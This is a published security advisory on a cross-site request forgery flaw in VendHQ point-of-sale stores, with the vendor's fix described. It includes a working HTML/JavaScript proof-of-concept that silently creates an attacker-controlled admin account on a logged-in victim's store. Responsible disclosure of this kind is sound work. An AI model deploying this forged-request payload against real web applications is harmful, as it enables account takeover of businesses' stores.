VendHQ Cross Site Request Forgery

2016.10.18
Credit: Ahsan Tahir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ # | ___ _ _____ _ _ | # | / _ \| | |_ _| | | (_) | # | / /_\ \ |__ ___ __ _ _ __ | | __ _| |__ _ _ __ | # | | _ | '_ \/ __|/ _` | '_ \ | |/ _` | '_ \| | '__| | # | | | | | | | \__ \ (_| | | | | | | (_| | | | | | | | # | \_| |_/_| |_|___/\__,_|_| |_| \_/\__,_|_| |_|_|_| | # | // Breaking Security Since Born! | # | | # | [-] Website: https://ahsantahir.py | # | [-] Email: support@ahsantahir.py | # | | # +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ ### # Title : VendHQ Add-admin CSRF Vulnerability [Full-Store Takeover] # Author : Ahsan Tahir # E-mail : mrahsan1337@gmail.com / support@ahsantahir.py # Web Site : www.ahsantahir.py # Facebook: http://fb.me/ahsantahiratofficial # Twitter : @AhsanTahirAT # Tested on : Kali Linux 2.0, Windows 8.1 # Vendor : https://www.vendhq.com ### Release Date: ============= 2016-10-14 Product & Service Introduction: =============================== Vend is retail POS software, inventory management, ecommerce & customer loyalty for iPad, Mac and PC. Easily manage & grow your business in the cloud. Abstract Advisory Information: ============================== Ahsan Tahir, an independent vulnerability researcher discovered an add-admin CSRF vulnerability, which could lead to full store-takeover of any VendHQ store! Vulnerability Disclosure Timeline: ================================== 2016-07-20: Found the vulnerability. 2016-07-20: Reported to vendor. 2016-07-22: Vendor Replied. 2016-07-22: Vendor Fixed the vulnerability. 2016-07-31: Vendor rewarded the researcher. 2016-10-14: Public Disclosure Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Cross-Site Request Forgery vulnerability has been discovered in VendHQ stores. This allows remote attackers to craft a HTML Form, which requests a new admin on vendhq stores, when run by a victim, while he/she is logged in, and if the victim visits a page, his/her store will be HACKED/Pwn3d! Proof of Concept (PoC): ======================= This vulnerability can be exploited by an attacker if he/she injects this code in his webpage, which they want their victim to visit! <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://<your-store>.vendhq.com/user/create", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30540262821640"); xhr.withCredentials = true; var body = "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][id]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[id]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[name]\"\r\n" + "\r\n" + "Hacked\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[display_name]\"\r\n" + "\r\n" + "A cashier\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[email]\"\r\n" + "\r\n" + "ahsan@ahsan.com\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[password]\"\r\n" + "\r\n" + "TestingPassword1\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[password_again]\"\r\n" + "\r\n" + "TestingPassword1\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[group_id]\"\r\n" + "\r\n" + "5\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[outlet_id][]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------30540262821640\r\n" + "Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][image]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------30540262821640--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> While a victim is logged in to his/her vend store and visits a webpage with the above code injected, a new admin will be created in their store, with the name as "Hacked" and the Password is "TestPassword1" and email: ahsan@ahsan.com Credits & Authors: ================== Ahsan Tahir - [https://twitter.com/AhsanTahirAT]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top